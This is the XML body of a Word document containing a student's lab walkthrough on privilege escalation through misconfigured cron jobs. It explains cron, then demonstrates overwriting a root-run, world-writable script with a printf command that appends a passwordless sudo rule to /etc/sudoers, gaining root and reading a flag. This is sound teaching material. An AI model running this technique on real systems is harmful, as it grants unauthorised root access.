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85653E" w14:textId="300A675A" w:rsidR="00853ABF" w:rsidRPr="00986F87" w:rsidRDefault="00986F87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986F87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Misconfigured Cron Jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64C530" w14:textId="77777777" w:rsidR="00986F87" w:rsidRDefault="00986F87"/>
    <w:p w14:paraId="002A542A" w14:textId="0B1566A2" w:rsidR="00986F87" w:rsidRDefault="00986F87">
      <w:r>
        <w:t xml:space="preserve">Task scheduling </w:t>
      </w:r>
      <w:r w:rsidR="00A81111">
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the cron.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDE7B9F" w14:textId="03CCC195" w:rsidR="00986F87" w:rsidRDefault="00986F87">
      <w:r w:rsidRPr="00FD2B0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00A81111">
        <w:t>time-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA275D" w14:textId="7AA5B5E8" w:rsidR="00A81111" w:rsidRDefault="00A81111">
      <w:r>
        <w:t xml:space="preserve">The app or script that has been configured to run repeatedly with cron is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1490F78C" w14:textId="04AC3C82" w:rsidR="00C213A3" w:rsidRDefault="00C213A3">
      <w:r w:rsidRPr="00FD2B0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crontab file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> store and track the jobs that have been created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4133AD73" w14:textId="77777777" w:rsidR="00FD2B0E" w:rsidRDefault="00FD2B0E"/>
    <w:p w14:paraId="7ADE5E25" w14:textId="455A5A23" w:rsidR="00371D38" w:rsidRDefault="00371D38">
      <w:r>
        <w:t>Cron jobs can also be run by any users on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1BFFE" w14:textId="77777777" w:rsidR="00253BAB" w:rsidRDefault="00253BAB"/>
    <w:p w14:paraId="27C7B3E8" w14:textId="6A4DC334" w:rsidR="00253BAB" w:rsidRPr="00253BAB" w:rsidRDefault="00253BAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00253BAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step taken in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidRPr="00253BAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD38C06" w14:textId="7CAE35EE" w:rsidR="00D1115B" w:rsidRDefault="00253BAB">
      <w:r>
        <w:t>Identify the file</w:t>
      </w:r>
      <w:r w:rsidR="00D1115B">
        <w:t>,script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidR="00D1115B">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by cron job</w:t>
      </w:r>
      <w:r w:rsidR="00D1115B">
        <w:t xml:space="preserve"> and when it run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0075F5A5" w14:textId="625CD11F" w:rsidR="00253BAB" w:rsidRDefault="00253BAB">
      <w:r>
        <w:t>Identify is it modify by non-root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4192C9" w14:textId="55CFFB1D" w:rsidR="00253BAB" w:rsidRDefault="00253BAB">
      <w:r>
        <w:t xml:space="preserve">Modify the shell script and then add the command to add </w:t>
      </w:r>
      <w:r w:rsidR="00D1115B">
        <w:t xml:space="preserve">current </w:t>
      </w:r>
      <w:r>
        <w:t>user to the sudeors file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54E1DB" w14:textId="42778ED9" w:rsidR="00253BAB" w:rsidRDefault="00D1115B">
      <w:r>
        <w:t>To run command that require the no password to run any command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E58E4" w14:textId="77777777" w:rsidR="00D1115B" w:rsidRDefault="00D1115B"/>
    <w:p w14:paraId="63F89282" w14:textId="521962A9" w:rsidR="008931FC" w:rsidRPr="008931FC" w:rsidRDefault="008931FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008931FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F46E1D" w14:textId="221DC97E" w:rsidR="008931FC" w:rsidRPr="008931FC" w:rsidRDefault="008931FC" w:rsidP="008931FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008931FC">
        <w:t>Step 1 → Find root-owned cron jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C314AFE" w14:textId="5099A244" w:rsidR="008931FC" w:rsidRPr="008931FC" w:rsidRDefault="008931FC" w:rsidP="008931FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008931FC">
        <w:t>Step 2 → Check what they execute</w:t>
      </w:r>
      <w:r w:rsidR="00307323">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A16C0CD" w14:textId="69857CAA" w:rsidR="008931FC" w:rsidRPr="008931FC" w:rsidRDefault="008931FC" w:rsidP="008931FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008931FC">
        <w:t>Step 3 → Look for misconfigurations (world-writable scripts, insecure paths, environment variables, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC383D" w14:textId="43E88F8B" w:rsidR="008931FC" w:rsidRPr="00A81111" w:rsidRDefault="008931FC">
      <w:r w:rsidRPr="008931FC">
        <w:t>Many common misconfigurations in cron jobs can lead to privilege escalation."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192242D" w14:textId="77777777" w:rsidR="00A81111" w:rsidRDefault="00A81111"/>
    <w:p w14:paraId="25766639" w14:textId="73FEA764" w:rsidR="00A81111" w:rsidRPr="008931FC" w:rsidRDefault="008931FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008931FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76EE61" w14:textId="4A783C70" w:rsidR="009A7D08" w:rsidRDefault="009A7D08">
      <w:r>
        <w:t>The access is get to the target system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAFADB5" w14:textId="5E69B5E7" w:rsidR="009A7D08" w:rsidRDefault="009A7D08">
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FFF99" w14:textId="508E8D89" w:rsidR="009A7D08" w:rsidRDefault="009A7D08">
      <w:r>
        <w:t>Groups student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF215DD" w14:textId="28327F58" w:rsidR="009A7D08" w:rsidRDefault="009A7D08">
      <w:r>
        <w:t>Cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED038D" w14:textId="16B7011F" w:rsidR="009A7D08" w:rsidRDefault="00DD1C9A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># check for the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF82EF" w14:textId="260D92BE" w:rsidR="00DD1C9A" w:rsidRDefault="00DD1C9A">
      <w:r>
        <w:t>Crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05C67D" w14:textId="7A76B393" w:rsidR="00DD1C9A" w:rsidRDefault="00DD1C9A">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1C9A">
        <w:t xml:space="preserve">only shows the cron jobs of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1C9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>current user</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1C9A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6299EEFA" w14:textId="21577579" w:rsidR="00DD1C9A" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D34B3" w14:textId="14D26F47" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t># see the owner of the files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FE275" w14:textId="7075AD70" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Cat message_file_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9E49E4" w14:textId="1BF7110F" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t># output:access denied (only owner can read )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CABC5DC" w14:textId="6B69EB42" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3D38F" w14:textId="2BC331F7" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6768ACA2" w14:textId="2B6DCBD2" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Grep -rnw /usr -e “home/students/message”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114F299" w14:textId="77777777" w:rsidR="00BE1B25" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A21BE" w14:textId="77777777" w:rsidR="00BE1B25" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25" w:rsidP="00BE1B25">
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> → Searches text in files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D52DC" w14:textId="77777777" w:rsidR="00BE1B25" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25" w:rsidP="00BE1B25">
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-r</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> → Search </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recursively</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> through all files in /usr and its subdirectories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A09DC9" w14:textId="77777777" w:rsidR="00BE1B25" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25" w:rsidP="00BE1B25">
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> → Show the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>line number</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> where the match occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1F606" w14:textId="77777777" w:rsidR="00BE1B25" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25" w:rsidP="00BE1B25">
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-w</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> → Match the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whole word</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> only (not as part of another word).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7FB06" w14:textId="77777777" w:rsidR="00BE1B25" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25" w:rsidP="00BE1B25">
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/usr</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> → The directory to start searching in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEBE82E" w14:textId="631BEFC1" w:rsidR="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-e "home/students/message"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1B25">
        <w:t xml:space="preserve"> → The search pattern (string you’re looking for).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A78EC" w14:textId="1BAB7D20" w:rsidR="00DD1C9A" w:rsidRPr="00BE1B25" w:rsidRDefault="00BE1B25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1B25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DBD42" w14:textId="37C1B148" w:rsidR="00A81111" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Ls -la /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC8DCA" w14:textId="13344F3C" w:rsidR="00A81111" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Cat /tmp/message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3397B" w14:textId="6373D28C" w:rsidR="00A81111" w:rsidRDefault="00BE1B25">
      <w:r>
        <w:t>Ls -la /usr/local/share/copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4364B95F" w14:textId="727C7BF6" w:rsidR="00BE1B25" w:rsidRDefault="004360AC">
      <w:r>
        <w:t># edit it  to execute it by cron job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEB043D" w14:textId="5E3780DB" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61">
      <w:r>
        <w:t># as we donot have any editor so I use this to add data to copy.sh file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE94397" w14:textId="77777777" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61"/>
    <w:p w14:paraId="6FD66E99" w14:textId="0C95D3C1" w:rsidR="004360AC" w:rsidRDefault="00AF5B61">
      <w:r>
        <w:t>Printf ‘#!/bin/bash\necho ”student ALL=NOPASSWD:ALL” &gt;&gt;/etc/sudoers’ &gt;/usr/local/share/copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEEEA4F" w14:textId="0EDAB583" w:rsidR="004360AC" w:rsidRDefault="00AF5B61">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5B61">
        <w:t xml:space="preserve">it would </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>append text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r>
        <w:t>student ALL=NOPASSWD:ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to the end of the /etc/sudoers file</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5B61">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC25077" w14:textId="77777777" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61"/>
    <w:p w14:paraId="36118F41" w14:textId="77721CA8" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61">
      <w:r>
        <w:t xml:space="preserve">Cat  </w:t>
      </w:r>
      <w:r>
        <w:t>/usr/local/share/copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F92AE3D" w14:textId="77777777" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61"/>
    <w:p w14:paraId="62C2E8F4" w14:textId="3669719F" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61">
      <w:r>
        <w:t>Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466499C2" w14:textId="01FBCE5E" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61">
      <w:r>
        <w:t># show the user part of sudoers group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E9723" w14:textId="4FF765E7" w:rsidR="00E54363" w:rsidRDefault="008C30FC">
      <w:r>
        <w:t>Sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8C222" w14:textId="6621F9E7" w:rsidR="008C30FC" w:rsidRDefault="00537FA2">
      <w:r>
        <w:t xml:space="preserve">Whoami </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F504BC" w14:textId="1BBF0B38" w:rsidR="00537FA2" w:rsidRDefault="00537FA2">
      <w:r>
        <w:t># it show root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EFA41" w14:textId="2BF07FFC" w:rsidR="00537FA2" w:rsidRDefault="00537FA2">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D0181" w14:textId="2B1A9832" w:rsidR="00537FA2" w:rsidRDefault="00537FA2">
      <w:r>
        <w:t>Cat flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D8954" w14:textId="614A3F4D" w:rsidR="00537FA2" w:rsidRDefault="00D1115B">
      <w:r>
        <w:t>Crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFCFE0" w14:textId="77777777" w:rsidR="00D1115B" w:rsidRDefault="00D1115B"/>
    <w:p w14:paraId="31874D2D" w14:textId="77777777" w:rsidR="00AF5B61" w:rsidRDefault="00AF5B61"/>
    <w:p w14:paraId="3ABA0B62" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRDefault="00C31CAF"/>
    <w:p w14:paraId="34BA7354" w14:textId="4F737265" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9DA69" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t xml:space="preserve"> exists in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>both Linux and Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t>, but the tool/mechanism is different:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786CDC70" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux/Unix</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t xml:space="preserve"> → uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t xml:space="preserve"> (and sometimes at).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03519CEB" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:t>cron runs tasks at specific times or intervals (e.g., every day at 2 AM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD89F5" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A26AC0" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:t>crontab -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62052B21" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:r w:rsidRPr="00C31CAF">
        <w:t>→ runs /path/to/script.sh every day at 2:00 AM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5477B6" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t xml:space="preserve"> → uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task Scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72818271" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:t>Same purpose as cron, but managed with GUI or commands like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6650946E" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:r w:rsidRPr="00C31CAF">
        <w:t>→ schedules a script daily at 2:00 AM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B38F8" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31CAF">
        <w:t xml:space="preserve"> So:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A56959" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux = cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC73A58" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF" w:rsidP="00C31CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows = Task Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BFECE" w14:textId="77777777" w:rsidR="00C31CAF" w:rsidRPr="00C31CAF" w:rsidRDefault="00C31CAF"/>
    <w:sectPr w:rsidR="00C31CAF" w:rsidRPr="00C31CA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F05654"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A7A2748"/>
    <w:lvl w:ilvl="0" w:tplc="063205A8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65B38C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93605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F54695A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDAA2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01430CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="469C5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6D458D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="609E0A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A1E77EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94D4F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7237282"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CC617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28899637">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="300618120">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1519736695">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="16808482">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1024937841">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="194123596">
